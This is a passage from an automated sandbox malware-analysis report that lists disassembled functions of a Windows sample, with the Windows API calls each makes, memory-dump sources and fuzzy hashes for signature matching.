                                              • Opcode Fuzzy Hash: 53d378f4a640946df70f282175db2fee3a2207521deddc3d153e1de3faae0f01
                                              • Instruction Fuzzy Hash: 3B11F6796006299FCB00FB64C94096EB7F5FF48364B058448EC9AAB361CB30FD01CB90
                                              Function 00E86E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00E86E80
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00EC59A2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 1c96c972767105230b85e6c42a0caf1a2f7d16ffcc390bf35748324f3f5abb4e
                                              • Instruction ID: 31bc71b8b0bfc15366346071dfb069138c156305197ad37590c6f27d17479d0d
                                              • Opcode Fuzzy Hash: 1c96c972767105230b85e6c42a0caf1a2f7d16ffcc390bf35748324f3f5abb4e
                                              • Instruction Fuzzy Hash: 1E016D31145225B6E3301A26CC0EF977F98AF02774F108214BAAC7E1E0C7B45955CB90
                                              Function 00E832A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00E832C4
                                                • Part of subcall function 00E8326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E83282
                                                • Part of subcall function 00E8326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E83299
                                                • Part of subcall function 00E83312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E832EF,?), ref: 00E83342
                                                • Part of subcall function 00E83312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E832EF,?), ref: 00E83355
                                                • Part of subcall function 00E83312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F52418,00F52400,?,?,?,?,?,?,00E832EF,?), ref: 00E833C1
                                                • Part of subcall function 00E83312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E83442
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E832FE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                              • String ID:
                                              • API String ID: 1550534281-0
                                              • Opcode ID: df95f6fd5818b34a2d50df5c02476e217e3ecfa1c22368ce938327f24e5bea83
                                              • Instruction ID: 66c54f11b1c51bff9a47a668e0a9434f2ca3379c8205b7b6d7844b23b999dec9
                                              • Opcode Fuzzy Hash: df95f6fd5818b34a2d50df5c02476e217e3ecfa1c22368ce938327f24e5bea83
                                              • Instruction Fuzzy Hash: 61F05E7265434C9FE740BF70EC0AB683BE0A706B16F145A05B60DA90F3DBB99550AB00
                                              Function 00E9F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00E9F97A
                                                • Part of subcall function 00E8EDFE: GetInputState.USER32 ref: 00E8EEB7
                                              • Sleep.KERNEL32(00000000), ref: 00EDFAC2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: InputSleepStateTimetime
                                              • String ID:
                                              • API String ID: 4149333218-0
                                              • Opcode ID: b7a49b660689b60c27f2ea5eb69196f33db3fa1808ff735ee90dd5b66c84a3b3
                                              • Instruction ID: f1678bb6e46b92dcfaa75a0d1945c797a18f1c962167ec36f54b657e389fc9b1
                                              • Opcode Fuzzy Hash: b7a49b660689b60c27f2ea5eb69196f33db3fa1808ff735ee90dd5b66c84a3b3
                                              • Instruction Fuzzy Hash: 67F08271240605AFD310FF69D405B96B7F9FF45361F00406AE45ED7350DB70A800CB91
                                              Function 00E88774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00E8AE65,?,?,?), ref: 00E88793
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00E8AE65,?,?,?), ref: 00E887C9
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 626452242-0
                                              • Opcode ID: ded07a25665abcbe7add7ab887f194ba8509e98e7a7bc8049c9b01381a05d412
                                              • Instruction ID: 79efc55bac518cceca8703da50232975c6a7b8949cee3079a95e7a9f64a9c8f7
                                              • Opcode Fuzzy Hash: ded07a25665abcbe7add7ab887f194ba8509e98e7a7bc8049c9b01381a05d412
                                              • Instruction Fuzzy Hash: E80184713411047FEB186B699D4BFBF7AEDDB85750F14412EB50AEA190ED61AC009624
                                              Function 00E8CA50 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00E8CE8E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID:
                                              • API String ID: 1385522511-0
                                              • Opcode ID: dbc07acfdde4965d596837ef0ab2420a659f7d519242e7b44f578d041d9f4671
                                              • Instruction ID: 33b68f97f6bea40b1de334ee687141cdb285086bc3135c635fe51ad8e31de825
                                              • Opcode Fuzzy Hash: dbc07acfdde4965d596837ef0ab2420a659f7d519242e7b44f578d041d9f4671
                                              • Instruction Fuzzy Hash: C132D374A00205AFDB14EF58C884ABAB7F5EF45344F25A09AE91DBB351C734ED42CBA1
                                              Function 00EAF126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6218dc32e1c2821ce64a4d5ad7168f72957aed3c5f5ac7c2ed982fd646dc9e21
                                              • Instruction ID: f25ef99318cf3a2cb0857839abb605742bb973c67827fafd34bcfaf425bd8c0e
                                              • Opcode Fuzzy Hash: 6218dc32e1c2821ce64a4d5ad7168f72957aed3c5f5ac7c2ed982fd646dc9e21
                                              • Instruction Fuzzy Hash: 51519975A00108AFDB14DF98C841BA97BF5EF8A364F199168E854AF361C771FD42CBA0
                                              Function 00EA0000 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                              Download Yara Rule
                                              APIs
                                              • TerminateProcess.KERNELBASE ref: 00EA00AF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ProcessTerminate
                                              • String ID:
                                              • API String ID: 560597551-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 69374e46e53af791d906cc385e1453bef58d41d1fd0ffe8b00e5ec0e2fc4542a
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: 7F31C570A00105DFC718CF58C4D0A69FBA5FF5A314B649AA5E40AEF256D732EDC1CB90
                                              Function 00EF8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00EF8EBE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FullNamePathPrivateProfileString
                                              • String ID:
                                              • API String ID: 1991638491-0
                                              • Opcode ID: 3c9e8752720545e4f180ce1578d52c6e82ffad97bc4d1a0eb7c6d13349954f6d
                                              • Instruction ID: bf58cb12f20589580f39c297a3bcf05fe4691c64ef8821a3023ec48083204f44
                                              • Opcode Fuzzy Hash: 3c9e8752720545e4f180ce1578d52c6e82ffad97bc4d1a0eb7c6d13349954f6d
                                              • Instruction Fuzzy Hash: D5211D75600615AFCB14FB64C946CAEBBF5EF59360B055054FA497B3A1CB30BD41CB90
                                              Function 00E8636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E86332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8633E
                                                • Part of subcall function 00E86332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E86350
                                                • Part of subcall function 00E86332: FreeLibrary.KERNEL32(00000000,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86362
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8639F
                                                • Part of subcall function 00E862FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86304
                                                • Part of subcall function 00E862FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E86316
                                                • Part of subcall function 00E862FB: FreeLibrary.KERNEL32(00000000,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86329
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Library$Load$AddressFreeProc
                                              • String ID:
                                              • API String ID: 2632591731-0
                                              • Opcode ID: d4ac5ef7bf088abba41042912b04349460d0a6a3b4d50aa99032efd6cc4cfdf6
                                              • Instruction ID: 3856254a761d50b512404fc5d2b173f2f5cd3e4c5f3153bd6a7eef8997de912e
                                              • Opcode Fuzzy Hash: d4ac5ef7bf088abba41042912b04349460d0a6a3b4d50aa99032efd6cc4cfdf6
                                              • Instruction Fuzzy Hash: 0A113A32200204ABCB15FB30CD02FAD77E1AF91711F10842DF48FBA1D1DEB49A459750
                                              Function 00EB8792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: 3216e96b6fff58fb5bb4f0939a4ea1e1d010abec0edcd6a842252cbec70174e7
                                              • Instruction ID: 198a3888004b8f90a3658a496887089a2125fd9a46558f1f4a619d4f8b95dd2b
                                              • Opcode Fuzzy Hash: 3216e96b6fff58fb5bb4f0939a4ea1e1d010abec0edcd6a842252cbec70174e7
                                              • Instruction Fuzzy Hash: 8011067590420AAFCB15DF58EA41ADB7BF9EF48314F114069F809AB311DA31EA11CBA5
                                              Function 00E8B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00E86B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00E8B0AC
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: b2e8bb4e3e300638153ba3ec73f1c655533e43645295e78fcd86f3f68e2b4757
                                              • Instruction ID: 9dd3aa353aeef24aa5baeba452483dfa9597500958aa9496b9d8b48f07546695
                                              • Opcode Fuzzy Hash: b2e8bb4e3e300638153ba3ec73f1c655533e43645295e78fcd86f3f68e2b4757
                                              • Instruction Fuzzy Hash: B6113A31200705DFD7209E15C880BA7B7E9EF44354F10C42DE9AE97A51C7B2A949CB60
                                              Function 00E841E6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E833E9,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E84227
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FullNamePath_wcslen
                                              • String ID:
                                              • API String ID: 4019309064-0
                                              • Opcode ID: 5f9bcce2b741a8c3b001e3ffd77443f1b905ede0f4790dda4e18a4a555d7a851
                                              • Instruction ID: 71dec43294003b3d7f2cfcf759a8e736b312fc8de080f0e1f20f0d0e5b271f2e
                                              • Opcode Fuzzy Hash: 5f9bcce2b741a8c3b001e3ffd77443f1b905ede0f4790dda4e18a4a555d7a851
                                              • Instruction Fuzzy Hash: 2811E1B160420A9BCB40FBE48901EDD77F8EF09314B001065B99CF72E2EE70E7889B11
                                              Function 00EAE992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                              • Instruction ID: 5aa988a2554262a4d8b15957e83f5b75a59986071a1eb4cc704ee70080e1dd3d
                                              • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                              • Instruction Fuzzy Hash: C8F0F432601B205AC6253A6A9C05BAB32D89F8B334F142B55F965BA2D1DF74F8028692
                                              Function 00EB500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00EB31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00EB504E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d69aa5fb4b9a5795ed8bf00ccaa7af800a60124c2ef09793de692a48293a7bb6
                                              • Instruction ID: 1f0d44aae67c40de1f20a8cc61ff32f2e969d278e688162c6f0eac95d5b9f8bc
                                              • Opcode Fuzzy Hash: d69aa5fb4b9a5795ed8bf00ccaa7af800a60124c2ef09793de692a48293a7bb6
                                              • Instruction Fuzzy Hash: 58F0E933600E2467DB313B62AC01BDB3798AF457B1B14A116FC04BA1A0CA74EC0096E0
                                              Function 00EB3BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00EA6A99,?,0000015D,?,?,?,?,00EA85D0,000000FF,00000000,?,?), ref: 00EB3BE2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 71d565541c4a48b8d0a8300cf197e7a6adf5f5dbc36fc91cb4fa36aa464a124c
                                              • Instruction ID: 2e91af380fb511e176326877237ab46c750a57b0a623d44ed363dc574c7c6db3
                                              • Opcode Fuzzy Hash: 71d565541c4a48b8d0a8300cf197e7a6adf5f5dbc36fc91cb4fa36aa464a124c
                                              • Instruction Fuzzy Hash: 72E0653120462457E6612B7AAC82FDB3698DB427B5F152162EC45F6495DB61ED0081E1
                                              Function 00E863DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5dcbb912798ce3dc0709aef7ae2bd06ab721b1923bd9c9cd33af824d4d12f799
                                              • Instruction ID: 9b10c0e8bf27b801103347b4e0fc197fbeffb7cf81d47d9342d9e007fc63d4a8
                                              • Opcode Fuzzy Hash: 5dcbb912798ce3dc0709aef7ae2bd06ab721b1923bd9c9cd33af824d4d12f799
                                              • Instruction Fuzzy Hash: 04F03971101B12CFCB34AF64D494866BBF5FF1432A324993EE1DBA2A20C732A880DF50
                                              Function 00E8653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
